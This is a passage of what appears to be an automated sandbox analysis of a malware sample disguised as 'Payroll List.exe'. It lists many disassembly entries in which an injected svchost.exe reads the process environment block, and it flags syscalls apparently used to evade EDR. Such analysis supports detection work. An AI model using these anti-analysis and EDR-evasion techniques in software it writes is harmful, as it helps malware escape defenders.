                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A830 mov eax, dword ptr fs:[00000030h]2_2_0396A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]2_2_039D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]2_2_039D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960854 mov eax, dword ptr fs:[00000030h]2_2_03960854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]2_2_03934859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]2_2_03934859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03942840 mov ecx, dword ptr fs:[00000030h]2_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]2_2_039BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]2_2_039BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]2_2_039C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]2_2_039C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]2_2_03962F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]2_2_03962F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CF80 mov eax, dword ptr fs:[00000030h]2_2_0396CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04FE7 mov eax, dword ptr fs:[00000030h]2_2_03A04FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]2_2_0392EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]2_2_0392EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]2_2_0392EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC8 mov eax, dword ptr fs:[00000030h]2_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC8 mov eax, dword ptr fs:[00000030h]2_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC8 mov eax, dword ptr fs:[00000030h]2_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC8 mov eax, dword ptr fs:[00000030h]2_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970FF6 mov eax, dword ptr fs:[00000030h]2_2_03970FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970FF6 mov eax, dword ptr fs:[00000030h]2_2_03970FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970FF6 mov eax, dword ptr fs:[00000030h]2_2_03970FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970FF6 mov eax, dword ptr fs:[00000030h]2_2_03970FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E6FF7 mov eax, dword ptr fs:[00000030h]2_2_039E6FF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE0 mov eax, dword ptr fs:[00000030h]2_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE0 mov eax, dword ptr fs:[00000030h]2_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932F12 mov eax, dword ptr fs:[00000030h]2_2_03932F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CF1F mov eax, dword ptr fs:[00000030h]2_2_0396CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E6F00 mov eax, dword ptr fs:[00000030h]2_2_039E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EF28 mov eax, dword ptr fs:[00000030h]2_2_0395EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CF50 mov eax, dword ptr fs:[00000030h]2_2_0392CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CF50 mov eax, dword ptr fs:[00000030h]2_2_0392CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CF50 mov eax, dword ptr fs:[00000030h]2_2_0392CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CF50 mov eax, dword ptr fs:[00000030h]2_2_0392CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CF50 mov eax, dword ptr fs:[00000030h]2_2_0392CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CF50 mov eax, dword ptr fs:[00000030h]2_2_0392CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CF50 mov eax, dword ptr fs:[00000030h]2_2_0396CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04F68 mov eax, dword ptr fs:[00000030h]2_2_03A04F68
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0015A66C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00148189 SetUnhandledExceptionFilter,0_2_00148189
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001481AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
